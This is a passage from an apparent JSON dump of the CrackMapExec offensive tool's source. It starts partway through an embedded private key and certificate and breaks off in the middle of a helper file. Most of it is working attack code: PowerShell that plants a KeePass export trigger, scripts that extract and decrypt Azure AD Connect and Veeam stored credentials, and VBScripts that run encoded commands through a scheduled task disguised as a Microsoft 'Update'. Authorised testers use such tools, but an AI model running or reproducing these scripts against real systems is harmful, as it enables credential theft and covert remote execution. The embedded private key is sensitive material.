KEY-----\r\nMIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDLRxCDVVXmjcFW\r\nrvuwIZh6ywLNtffsTFQ2QAykUTl6CGzn+rpoz/s/AX7s2/dWkv+pcUULNNeH2Ae9\r\nYNhM7vQqDzKA4Rj1FzVO9LIQot3F32e9SQWk2zJ0dia3uaxrrZTQeLOpISa9g3Q0\r\nnnvflX2KjarZ/OUrxSJA3HRgx0C0N7bmyC/jXSeM8cLQxJjIdNpxeMfSA5koeEEJ\r\nhzaWZLgtJpX5NOxpeJBRfhPSOL3r2t2qUGnzctvHbPZmdyRwIRCAiJNSHZd+CirC\r\nayplzdaxDZ0rlMcpaeodOTpusBLmAWEP6uQEKrRBgL+AVOo7DpncIbmMQPkSA3La\r\nSlyh+dgRAgMBAAECggEBAJW58l/KK0t2fkHrAVfqZvWLMrVyovpZ/m03IBin+z33\r\nlsAH3eX1y4nNAEBWhQgvnkCgPcrTUS2t4YWMH8YK+60/JGPpaQid35YYhk/app9o\r\nvnCdqJqVGcTOghYxnN5zLHmhbjPVR0Ov35giY/t7kMzNLFsD+4kR2vkLaG0gVnhm\r\ngAZ0M7bN35LQT0Wk1SFjVPLwdsPb/Jvxo7ly7wVv7Y2D1vNCYoBQGoFL7/noGene\r\nmMQ+OVawP58KqoYn/WRLI9zmTWzohXvYJYvm+SiXultB4aBGgp4saYjD8gwSOBml\r\nwbz2LyRCcDVi46yDcy7iSLmMr6c4ZdkUpxRvtPJI5wECgYEA+AgBrSdOoU+pzPas\r\nHlrprQEn5XHn990wfJj5N77MtpJu7Gmf/0tWGQQ3wohmu8dfNZrE8ZsEupRUVIYh\r\n5mLOWMmujkjNpp6A5LzZcp3hnLklORoUirZka66QgC9RSYv08PlPLy7ru+aHYsg1\r\nuPZNcf+KgpQoCg10LFrXaCh8GlUCgYEA0c74b1Rxg2+Dr3pGfvoZcQhtg1FUOWR9\r\npoNFkkV7vAnzoR9xLDvRtsOcGL7fu/WDtBg/XsddzfaKtU2cE05cF888OV+TYs6U\r\nCturp+pz+Yyslh6x3AgygnpMGJp6rk5D9LLHmIWPpCPjbBSofEQL9IxKoQOYOlvm\r\n7VrBu7Kbus0CgYAD6NRl702s+z147pZt8A7o3DDNzArU/FaMUDj1aPt/ETXQYiXU\r\nd1KHGGrslQvRf+X/SU47ZK8hZb8iie602+/WtG8c7QbYznzHnjZrORPaTYzJpqCW\r\nQyO4EstSSeylFSCqP7PA0aODlbGim/dE0BUOa/G59y3eYrHnFRN6H9E89QKBgHHK\r\n+JGhUiPAYsLU5dFOomfc81Cq1qx+JWwffKdVykN1fk7gN8iO9TJUK6B8Peq6wWD3\r\nWb91EBp6YkbtPf52nJpJStevT8fiVQcCl7pt/dLWinCtWzgEtihwXj9l4a4SQuc/\r\n4+OEZSDYWiuvlKY5XeaYBI4J3hGg8MHBXJwJxk7tAoGBALBrop1vJVxZt4+Eb9gv\r\ncc5ZRtDi79MXPePDinhRivVi/48LsYoFXRtodjcAMWqAyH7n17Kxkvl1rRsaNAq/\r\nH4F0kXuTXReV3LtZmZTLXmju2spGz3e3yKqgB+7dWUauqK44WaO1rYz32hTxLxil\r\nkN8k77KmfNkqz+9WY6S4CqIh\r\n-----END PRIVATE KEY-----\r\n-----BEGIN CERTIFICATE-----\r\nMIIC+zCCAeOgAwIBAgIUPjiFj6PH8T2dFrcwoqL7bHkXKfQwDQYJKoZIhvcNAQEL\r\nBQAwDTELMAkGA1UEBhMCVVMwHhcNMjAwNTEwMTAyMzA5WhcNMjEwNTEwMTAyMzA5\r\nWjANMQswCQYDVQQGEwJVUzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB\r\nAMtHEINVVeaNwVau+7AhmHrLAs219+xMVDZADKRROXoIbOf6umjP+z8Bfuzb91aS\r\n/6lxRQs014fYB71g2Ezu9CoPMoDhGPUXNU70shCi3cXfZ71JBaTbMnR2Jre5rGut\r\nlNB4s6khJr2DdDSee9+VfYqNqtn85SvFIkDcdGDHQLQ3tubIL+NdJ4zxwtDEmMh0\r\n2nF4x9IDmSh4QQmHNpZkuC0mlfk07Gl4kFF+E9I4veva3apQafNy28ds9mZ3JHAh\r\nEICIk1Idl34KKsJrKmXN1rENnSuUxylp6h05Om6wEuYBYQ/q5AQqtEGAv4BU6jsO\r\nmdwhuYxA+RIDctpKXKH52BECAwEAAaNTMFEwHQYDVR0OBBYEFO+GlEFEBLb5Rv8x\r\nbx/bsBBNgwSxMB8GA1UdIwQYMBaAFO+GlEFEBLb5Rv8xbx/bsBBNgwSxMA8GA1Ud\r\nEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAHU17UUlL2rl+xLdBDRqcVBb\r\nDUWwvmkBL22G05LcIIjlA7YeeKHBA0D6ppulTZ+HWZ2mo2n10bIso+SryytGrU0g\r\np9Rt+mUDiWOQJWi0W6VAhK72wsJG5DnRdf5yXjbsY065iA4Q5UfhQd7TsR3q4EkD\r\n5ziOrKiuB5T3PR48aE/Cpg0aTGpx05OEVG6un1xwUpT6d6j5qP2IELaCG446ZZIO\r\n0BrvUoOTwYCV6UhhV1F3xirVFpUwTtp8Ms/fst4vSX9/6PgyBd09icB+O8t9LhXG\r\nb6FMHKpKOOkRQztqJR3ipMlW6Ceslwqs5CBRowbySi3C4kpEplM6hbVTelzwP6U=\r\n-----END CERTIFICATE-----\r\n" }, { "path": "cme/data/keepass_trigger_module/AddKeePassTrigger.ps1", "content": "$ExportPath = \"REPLACE_ME_ExportPath\"\n$ExportName = \"REPLACE_ME_ExportName\"\n$TriggerName = \"REPLACE_ME_TriggerName\"\n$KeePassXMLPath = \"REPLACE_ME_KeePassXMLPath\"\n$TriggerXML = [xml] @\"\n\n $([Convert]::ToBase64String([System.GUID]::NewGuid().ToByteArray()))\n\t$TriggerName\n\ttrue\n\t\n\t\t\n\t\t\tbES7XfGLTA2IzmXm6a0pig==\n\t\t\t\n\t\t\t\t1\n\t\t\t\tFalse\n\t\t\t\n\t\t\n\t\n\t\n\t\n\t\t\n\t\t\tD5prW87VRr65NO2xP5RIIg==\n\t\t\t\n\t\t\t\t$ExportPath\\$ExportName\n\t\t\t\tKeePass XML (2.x)\n\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\n\t\n\n\"@\nif($KeePassXMLPath -and ($KeePassXMLPath -match '.\\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {\n $KeePassXMLPath = Resolve-Path -Path $KeePassXMLPath\n $KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)\n if ($KeePassXML.Configuration.Application.TriggerSystem.Triggers -is [String]) {\n $Triggers = $KeePassXML.CreateElement('Triggers')\n $Null = $Triggers.AppendChild($KeePassXML.ImportNode($TriggerXML.Trigger, $True))\n $Null = $KeePassXML.Configuration.Application.TriggerSystem.ReplaceChild($Triggers, $KeePassXML.Configuration.Application.TriggerSystem.SelectSingleNode('Triggers'))\n }\n else {\n $Null = $KeePassXML.Configuration.Application.TriggerSystem.Triggers.AppendChild($KeePassXML.ImportNode($TriggerXML.Trigger, $True))\n }\n $KeePassXML.Save($KeePassXMLPath)\n}" }, { "path": "cme/data/keepass_trigger_module/RemoveKeePassTrigger.ps1", "content": "$KeePassXMLPath = \"REPLACE_ME_KeePassXMLPath\"\n$TriggerName = \"REPLACE_ME_TriggerName\"\nif($KeePassXMLPath -and ($KeePassXMLPath -match '.\\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {\n\t$KeePassXMLPath = Resolve-Path -Path $KeePassXMLPath\n\t$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)\n\t$RandomGUID = [System.GUID]::NewGuid().ToByteArray()\n\tif ($KeePassXML.Configuration.Application.TriggerSystem.Triggers -isnot [String]) {\n\t\t$Children = $KeePassXML.Configuration.Application.TriggerSystem.Triggers | ForEach-Object {$_.Trigger} | Where-Object {$_.Name -like $TriggerName}\n\t\tForEach($Child in $Children) {\n\t\t\t$KeePassXML.Configuration.Application.TriggerSystem.Triggers.RemoveChild($Child)\n\t\t}\n\t}\n\ttry {\n\t\t$KeePassXML.Save($KeePassXMLPath)\n\t}\n\tcatch {\n\t} \n}" }, { "path": "cme/data/keepass_trigger_module/RestartKeePass.ps1", "content": "$KeePassUser = \"REPLACE_ME_KeePassUser\"\n$KeePassBinaryPath = \"REPLACE_ME_KeePassBinaryPath\"\n$DummyServiceName = \"REPLACE_ME_DummyServiceName\"\nschtasks /create /tn \"$DummyServiceName\" /tr \"$KeePassBinaryPath\" /ru $KeePassUser /it /sc ONLOGON\ntaskkill /F /T /IM keepass.exe /FI \"USERNAME eq $KeePassUser\"\nschtasks /run /tn \"$DummyServiceName\"\nStart-Sleep -s 3\nschtasks /delete /tn \"$DummyServiceName\" /F" }, { "path": "cme/data/msol_dump/msol_dump.ps1", "content": "$sqlbin=@(Get-ChildItem -Path C:\\\"Program Files\"\\\"Microsoft SQL Server\"\\ -Filter sqllocaldb.exe -Recurse).fullname\n$db=@(cmd /c $sqlbin info | findstr /i ADSy)\n\n$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList \"Data Source=(localdb)\\$db;Initial Catalog=ADSync\"\n\ntry {\n $client.Open()\n} catch {\n Write-Host \"[!] Could not connect to localdb...\"\n return\n}\n\nWrite-Host \"[*] Querying ADSync localdb (mms_server_configuration)\"\n\n$cmd = $client.CreateCommand()\n$cmd.CommandText = \"SELECT keyset_id, instance_id, entropy FROM mms_server_configuration\"\n$reader = $cmd.ExecuteReader()\nif ($reader.Read() -ne $true) {\n Write-Host \"[!] Error querying mms_server_configuration\"\n return\n}\n\n$key_id = $reader.GetInt32(0)\n$instance_id = $reader.GetGuid(1)\n$entropy = $reader.GetGuid(2)\n$reader.Close()\n\nWrite-Host \"[*] Querying ADSync localdb (mms_management_agent)\"\n\n$cmd = $client.CreateCommand()\n$cmd.CommandText = \"SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'\"\n$reader = $cmd.ExecuteReader()\nif ($reader.Read() -ne $true) {\n Write-Host \"[!] Error querying mms_management_agent\"\n return\n}\n\n$config = $reader.GetString(0)\n$crypted = $reader.GetString(1)\n$reader.Close()\n\nWrite-Host \"[*] Using xp_cmdshell to run some Powershell as the service user\"\n\n$cmd = $client.CreateCommand()\n$cmd.CommandText = \"EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'powershell.exe -c `\"add-type -path ''C:\\Program Files\\Microsoft Azure AD Sync\\Bin\\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted`\"'\"\n$reader = $cmd.ExecuteReader()\n\n$decrypted = [string]::Empty\n\nwhile ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) {\n $decrypted += $reader.GetString(0)\n}\n\nif ($decrypted -eq [string]::Empty) {\n Write-Host \"[!] Error using xp_cmdshell to launch our decryption powershell\"\n return\n}\n\n$domain = select-xml -Content $config -XPath \"//parameter[@name='forest-login-domain']\" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}}\n$username = select-xml -Content $config -XPath \"//parameter[@name='forest-login-user']\" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}\n$password = select-xml -Content $decrypted -XPath \"//attribute\" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}\n\nWrite-Host \"Domain: $($domain.Domain)\"\nWrite-Host \"Username: $($username.Username)\"\nWrite-Host \"Password: $($password.Password)\"\n" }, { "path": "cme/data/veeam_dump_module/veeam_dump_mssql.ps1", "content": "$SqlDatabaseName = \"REPLACE_ME_SqlDatabase\"\n$SqlServerName = \"REPLACE_ME_SqlServer\"\n$SqlInstanceName = \"REPLACE_ME_SqlInstance\"\n\n#Forming the connection string\n$SQL = \"SELECT [user_name] AS 'User',[password] AS 'Password' FROM [$SqlDatabaseName].[dbo].[Credentials] WHERE password <> ''\" #Filter empty passwords\n$auth = \"Integrated Security=SSPI;\" #Local user\n$connectionString = \"Provider=sqloledb; Data Source=$SqlServerName\\$SqlInstanceName; Initial Catalog=$SqlDatabaseName; $auth;\"\n$connection = New-Object System.Data.OleDb.OleDbConnection $connectionString\n$command = New-Object System.Data.OleDb.OleDbCommand $SQL, $connection\n\n#Fetching encrypted credentials from the database\ntry {\n\t$connection.Open()\n\t$adapter = New-Object System.Data.OleDb.OleDbDataAdapter $command\n\t$dataset = New-Object System.Data.DataSet\n\t[void] $adapter.Fill($dataSet)\n\t$connection.Close()\n}\ncatch {\n\tWrite-Host \"Can't connect to DB! Exiting...\"\n\texit -1\n}\n\n$rows=($dataset.Tables | Select-Object -Expand Rows)\nif ($rows.count -eq 0) {\n\tWrite-Host \"No passwords found!\"\n\texit\n}\n\nAdd-Type -assembly System.Security\n#Decrypting passwords using DPAPI\n$rows | ForEach-Object -Process {\n\t$EnryptedPWD = [Convert]::FromBase64String($_.password)\n\t$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )\n\t$enc = [system.text.encoding]::Default\n\t$_.password = $enc.GetString($ClearPWD) -replace '\\s', 'WHITESPACE_ERROR'\n}\n\nWrite-Output $rows | Format-Table -HideTableHeaders | Out-String\n" }, { "path": "cme/data/veeam_dump_module/veeam_dump_postgresql.ps1", "content": "$PostgreSqlExec = \"REPLACE_ME_PostgreSqlExec\"\n$PostgresUserForWindowsAuth = \"REPLACE_ME_PostgresUserForWindowsAuth\"\n$SqlDatabaseName = \"REPLACE_ME_SqlDatabaseName\"\n\n$SQLStatement = \"SELECT user_name AS User,password AS Password FROM credentials WHERE password != '';\"\n$output = . $PostgreSqlExec -U $PostgresUserForWindowsAuth -w -d $SqlDatabaseName -c $SQLStatement --csv | ConvertFrom-Csv\n\nif ($output.count -eq 0) {\n\tWrite-Host \"No passwords found!\"\n\texit\n}\n\nAdd-Type -assembly System.Security\n#Decrypting passwords using DPAPI\n$output | ForEach-Object -Process {\n $EnryptedPWD = [Convert]::FromBase64String($_.password)\n\t$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )\n\t$enc = [system.text.encoding]::Default\n\t$_.password = $enc.GetString($ClearPWD) -replace '\\s', 'WHITESPACE_ERROR'\n}\n\nWrite-Output $output | Format-Table -HideTableHeaders | Out-String" }, { "path": "cme/data/wmiexec_event_vbscripts/Exec_Command_Silent.vbs", "content": "Dim command\ncommand = Base64StringDecode(\"REPLACE_ME_BASE64_COMMAND\")\n\nConst TriggerTypeDaily = 1\nConst ActionTypeExec = 0\nSet service = CreateObject(\"Schedule.Service\")\nCall service.Connect\nDim rootFolder\nSet rootFolder = service.GetFolder(\"\\\")\nDim taskDefinition\nSet taskDefinition = service.NewTask(0)\nDim regInfo\nSet regInfo = taskDefinition.RegistrationInfo\nregInfo.Description = \"Update\"\nregInfo.Author = \"Microsoft\"\nDim settings\nSet settings = taskDefinition.settings\nsettings.Enabled = True\nsettings.StartWhenAvailable = True\nsettings.Hidden = False\nsettings.DisallowStartIfOnBatteries = False\nDim triggers\nSet triggers = taskDefinition.triggers\nDim trigger\nSet trigger = triggers.Create(7)\nDim Action\nSet Action = taskDefinition.Actions.Create(ActionTypeExec)\nAction.Path = \"c:\\windows\\system32\\cmd.exe\"\nAction.arguments = \"/Q /c \" & command\nDim objNet, LoginUser\nSet objNet = CreateObject(\"WScript.Network\")\nLoginUser = objNet.UserName\nIf UCase(LoginUser) = \"SYSTEM\" Then\nElse\nLoginUser = Empty\nEnd If\nCall rootFolder.RegisterTaskDefinition(\"REPLACE_ME_TEMP_TASKNAME\", taskDefinition, 6, LoginUser, , 3)\nCall rootFolder.DeleteTask(\"REPLACE_ME_TEMP_TASKNAME\",0)\n\nFunction Base64StringDecode(ByVal vCode)\n Set oXML = CreateObject(\"Msxml2.DOMDocument\")\n Set oNode = oXML.CreateElement(\"base64\")\n oNode.dataType = \"bin.base64\"\n oNode.text = vCode\n Set BinaryStream = CreateObject(\"ADODB.Stream\")\n BinaryStream.Type = 1\n BinaryStream.Open\n BinaryStream.Write oNode.nodeTypedValue\n BinaryStream.Position = 0\n BinaryStream.Type = 2\n ' All Format => utf-16le - utf-8 - utf-16le\n BinaryStream.CharSet = \"utf-8\"\n Base64StringDecode = BinaryStream.ReadText\n Set BinaryStream = Nothing\n Set oNode = Nothing\nEnd Function" }, { "path": "cme/data/wmiexec_event_vbscripts/Exec_Command_WithOutput.vbs", "content": "Dim command, outputPath\ncommand = Base64StringDecode(\"REPLACE_ME_BASE64_COMMAND\")\noutputPath = \"C:\\Windows\\Temp\\REPLACE_ME_OUTPUT_FILE\"\n\nOn Error Resume Next\nSet objTestNewInst = GetObject(\"Winmgmts:root\\subscription:ActiveScriptEventConsumer.Name=\"\"REPLACE_ME_INSTANCEID\"\"\")\nIf Err.Number <> 0 Then\n Err.Clear\n If FileExists(outputPath) Then\n inputFile = outputPath\n Set inStream = CreateObject(\"ADODB.Stream\")\n inStream.Open\n inStream.type= 1 'TypeBinary\n inStream.LoadFromFile(inputFile)\n readBytes = inStream.Read()\n\n Set oXML = CreateObject(\"Msxml2.DOMDocument\")\n Set oNode = oXML.CreateElement(\"base64\")\n oNode.dataType = \"bin.base64\"\n oNode.nodeTypedValue = readBytes\n Base64Encode = oNode.text\n\n ' Write back into wmi class\n wbemCimtypeString = 8\n Set objClass = GetObject(\"Winmgmts:root\\subscription:ActiveScriptEventConsumer\")\n Set objInstance = objClass.spawninstance_\n objInstance.name=\"REPLACE_ME_INSTANCEID\"\n objInstance.scriptingengine=\"vbscript\"\n objInstance.scripttext = Base64Encode\n objInstance.put_\n Else\n Const TriggerTypeDaily = 1\n Const ActionTypeExec = 0\n Set service = CreateObject(\"Schedule.Service\")\n Call service.Connect\n Dim rootFolder\n Set rootFolder = service.GetFolder(\"\\\")\n Dim taskDefinition\n Set taskDefinition = service.NewTask(0)\n Dim regInfo\n Set regInfo = taskDefinition.RegistrationInfo\n regInfo.Description = \"Update\"\n regInfo.Author = \"Microsoft\"\n Dim settings\n Set settings = taskDefinition.settings\n settings.Enabled = True\n settings.StartWhenAvailable = True\n settings.Hidden = False\n settings.DisallowStartIfOnBatteries = False\n Dim triggers\n Set triggers = taskDefinition.triggers\n Dim trigger\n Set trigger = triggers.Create(7)\n Dim Action\n Set Action = taskDefinition.Actions.Create(ActionTypeExec)\n Action.Path = \"c:\\windows\\system32\\cmd.exe\"\n Action.arguments = \"/Q /c \" & command & \" 1> \" & outputPath & \" 2>&1\"\n Dim objNet, LoginUser\n Set objNet = CreateObject(\"WScript.Network\")\n LoginUser = objNet.UserName\n If UCase(LoginUser) = \"SYSTEM\" Then\n Else\n LoginUser = Empty\n End If\n Call rootFolder.RegisterTaskDefinition(\"REPLACE_ME_TEMP_TASKNAME\", taskDefinition, 6, LoginUser, , 3)\n Call rootFolder.DeleteTask(\"REPLACE_ME_TEMP_TASKNAME\",0)\n End If\nElse\n On Error Resume Next\n Set fso = CreateObject(\"Scripting.FileSystemObject\")\n fso.DeleteFile(outputPath)\n If Err.Number <> 0 Then\n Err.Clear\n End If\nEnd If\n\nFunction FileExists(FilePath)\n Set fso = CreateObject(\"Scripting.FileSystemObject\")\n If fso.FileExists(FilePath) Then\n FileExists=CBool(1)\n Else\n FileExists=CBool(0)\n End If\nEnd Function\n\nFunction Base64StringDecode(ByVal vCode)\n Set oXML = CreateObject(\"Msxml2.DOMDocument\")\n Set oNode = oXML.CreateElement(\"base64\")\n oNode.dataType = \"bin.base64\"\n oNode.text = vCode\n Set BinaryStream = CreateObject(\"ADODB.Stream\")\n BinaryStream.Type = 1\n BinaryStream.Open\n BinaryStream.Write oNode.nodeTypedValue\n BinaryStream.Position = 0\n BinaryStream.Type = 2\n ' All Format => utf-16le - utf-8 - utf-16le\n BinaryStream.CharSet = \"utf-8\"\n Base64StringDecode = BinaryStream.ReadText\n Set BinaryStream = Nothing\n Set oNode = Nothing\nEnd Function" }, { "path": "cme/first_run.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom os import mkdir\nfrom os.path import exists\nfrom os.path import join as path_join\nimport shutil\nfrom cme.paths import CME_PATH, CONFIG_PATH, TMP_PATH, DATA_PATH\nfrom cme.cmedb import initialize_db\nfrom cme.logger import cme_logger\n\n\ndef first_run_setup(logger=cme_logger):\n if not exists(TMP_PATH):\n mkdir(TMP_PATH)\n\n if not exists(CME_PATH):\n logger.display(\"First time use detected\")\n logger.display(\"Creating home directory structure\")\n mkdir(CME_PATH)\n\n folders = (\n \"logs\",\n \"modules\",\n \"protocols\",\n \"workspaces\",\n \"obfuscated_scripts\",\n \"screenshots\",\n )\n for folder in folders:\n if not exists(path_join(CME_PATH, folder)):\n logger.display(f\"Creating missing folder {folder}\")\n mkdir(path_join(CME_PATH, folder))\n\n initialize_db(logger)\n\n if not exists(CONFIG_PATH):\n logger.display(\"Copying default configuration file\")\n default_path = path_join(DATA_PATH, \"cme.conf\")\n shutil.copy(default_path, CME_PATH)\n\n # if not exists(CERT_PATH):\n # logger.display('Generating SSL certificate')\n # try:\n # check_output(['openssl', 'help'], stderr=PIPE)\n # if os.name != 'nt':\n # os.system('openssl req -new -x509 -keyout {path} -out {path} -days 365 -nodes -subj \"/C=US\" > /dev/null 2>&1'.format(path=CERT_PATH))\n # else:\n # os.system('openssl req -new -x509 -keyout {path} -out {path} -days 365 -nodes -subj \"/C=US\"'.format(path=CERT_PATH))\n # except OSError as e:\n # if e.errno == errno.ENOENT:\n # logger.error('OpenSSL command line utility is not installed, could not generate certificate, using default certificate')\n # default_path = path_join(DATA_PATH, 'default.pem')\n # shutil.copy(default_path, CERT_PATH)\n # else:\n # logger.error('Error while generating SSL certificate: {}'.format(e))\n # sys.exit(1)\n" }, { "path": "cme/helpers/__init__.py", "content": "" }, { "path": "cme/helpers/bash.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport os\nfrom cme.paths import DATA_PATH\n\n\ndef get_script(path):\n with open(os.path.join(DATA_PATH, path), \"r\") as script:\n return script.read()\n" }, { "path": "cme/helpers/bloodhound.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\ndef add_user_bh(user, domain, logger, config):\n users_owned = []\n if isinstance(user, str):\n users_owned.append({\"username\": user.upper(), \"domain\": domain.upper()})\n else:\n users_owned = user\n if config.get(\"BloodHound\", \"bh_enabled\") != \"False\":\n try:\n from neo4j.v1 import GraphDatabase\n except:\n from neo4j import GraphDatabase\n from neo4j.exceptions import AuthError, ServiceUnavailable\n\n uri = f\"bolt://{config.get('BloodHound', 'bh_uri')}:{config.get('BloodHound', 'bh_port')}\"\n\n driver = GraphDatabase.driver(\n uri,\n auth=(\n config.get(\"BloodHound\", \"bh_user\"),\n config.get(\"BloodHound\", \"bh_pass\"),\n ),\n encrypted=False,\n )\n try:\n with driver.session() as session:\n with session.begin_transaction() as tx:\n for info in users_owned:\n if info[\"username\"][-1] == \"$\":\n user_owned = info[\"username\"][:-1] + \".\" + info[\"domain\"]\n account_type = \"Computer\"\n else:\n user_owned = info[\"username\"] + \"@\" + info[\"domain\"]\n account_type = \"User\"\n\n result = tx.run(f'MATCH (c:{account_type} {{name:\"{user_owned}\"}}) RETURN c')\n\n if result.data()[0][\"c\"].get(\"owned\") in (False, None):\n logger.debug(f'MATCH (c:{account_type} {{name:\"{user_owned}\"}}) SET c.owned=True RETURN c.name AS name')\n result = tx.run(f'MATCH (c:{account_type} {{name:\"{user_owned}\"}}) SET c.owned=True RETURN c.name AS name')\n logger.highlight(f\"Node {user_owned} successfully set as owned in BloodHound\")\n except AuthError as e:\n logger.fail(f\"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid.\")\n return\n except ServiceUnavailable as e:\n logger.fail(f\"Neo4J does not seem to be available on {uri}.\")\n return\n except Exception as e:\n logger.fail(\"Unexpected error with Neo4J\")\n logger.fail(\"Account not found on the domain\")\n return\n driver.close()\n" }, { "path": "cme/helpers/http.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\n\n\ndef get_desktop_uagent(uagent=None):\n desktop_uagents = {\n \"MSIE9.0\": \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\",\n \"MSIE8.0\": \"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)\",\n \"MSIE7.0\": \"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)\",\n \"MSIE6.0\": \"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\",\n \"Chrome32\": \"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36\",\n \"Chrome31\": \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36\",\n \"Firefox25\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0\",\n \"Firefox24\": \"Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0,\",\n \"Safari5.1\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2\",\n \"Safari5.0\": \"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16\",\n }\n\n if not uagent:\n return desktop_uagents[random.choice(desktop_uagents.keys())]\n elif uagent:\n return desktop_uagents[uagent]\n" }, { "path": "cme/helpers/logger.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nfrom termcolor import colored\n\n\ndef write_log(data, log_name):\n logs_dir = os.path.join(os.path.expanduser(\"~/.cme\"), \"logs\")\n with open(os.path.join(logs_dir, log_name), \"w\") as log_output:\n log_output.write(data)\n\n\ndef highlight(text, color=\"yellow\"):\n if color == \"yellow\":\n return f\"{colored(text, 'yellow', attrs=['bold'])}\"\n elif color == \"red\":\n return f\"{colored(text, 'red', attrs=['bold'])}\"\n" }, { "path": "cme/helpers/misc.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\nimport string\nimport re\nimport inspect\nimport os\n\n\ndef identify_target_file(target_file):\n with open(target_file, \"r\") as target_file_handle:\n for i, line in enumerate(target_file_handle):\n if i == 1:\n if line.startswith(\"\\n\"):\n return \"nmap\"\n\n return \"unknown\"\n\n\ndef gen_random_string(length=10):\n return \"\".join(random.sample(string.ascii_letters, int(length)))\n\n\ndef validate_ntlm(data):\n allowed = re.compile(\"^[0-9a-f]{32}\", re.IGNORECASE)\n if allowed.match(data):\n return True\n else:\n return False\n\n\ndef called_from_cmd_args():\n for stack in inspect.stack():\n if stack[3] == \"print_host_info\":\n return True\n if stack[3] == \"plaintext_login\" or stack[3] == \"hash_login\" or stack[3] == \"kerberos_login\":\n return True\n if stack[3] == \"call_cmd_args\":\n return True\n return False\n\n\n# Stolen from https://github.com/pydanny/whichcraft/\ndef which(cmd, mode=os.F_OK | os.X_OK, path=None):\n \"\"\"Given a command, mode, and a PATH string, return the path which\n conforms to the given mode on the PATH, or None if there is no such\n file.\n `mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result\n of os.environ.get(\"PATH\"), or can be overridden with a custom search\n path.\n Note: This function was backported from the Python 3 source code.\n \"\"\"\n\n # Check that a given file can be accessed with the correct mode.\n # Additionally check that `file` is not a directory, as on Windows\n # directories pass the os.access check.\n def _access_check(fn, mode):\n return os.path.exists(fn) and os.access(fn, mode) and not os.path.isdir(fn)\n\n # If we're given a path with a directory part, look it up directly\n # rather than referring to PATH directories. This includes checking\n # relative to the current directory, e.g. ./script\n if os.path.dirname(cmd):\n if _access_check(cmd, mode):\n return cmd\n return None\n\n if path is None:\n path = os.environ.get(\"PATH\", os.defpath)\n if not path:\n return None\n path = path.split(os.pathsep)\n\n files = [cmd]\n\n seen = set()\n for dir in path:\n normdir = os.path.normcase(dir)\n if normdir not in seen:\n seen.add(normdir)\n for thefile in files:\n name = os.path.join(dir, thefile)\n if _access_check(name, mode):\n return name\n return None\n" }, { "path": "cme/helpers/msada_guids.py", "content": "\"\"\"\nImpacket - Collection of Python classes for working with network protocols.\n\nSECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved.\n\nThis software is provided under a slightly modified version\nof the Apache Software License. See the accompanying LICENSE file\nfor more information.\n\nAuthors:\n Charlie BROMBERG (@_nwodtuhs)\n Guillaume DAUMAS (@BlWasp_)\n Lucien DOUSTALY (@Wlayzz)\n\nReferences:\n MS-ADA1, MS-ADA2, MS-ADA3 Active Directory Schema Attributes and their GUID:\n - [MS-ADA1] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada1/19528560-f41e-4623-a406-dabcfff0660f\n - [MS-ADA2] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/e20ebc4e-5285-40ba-b3bd-ffcb81c2783e\n - 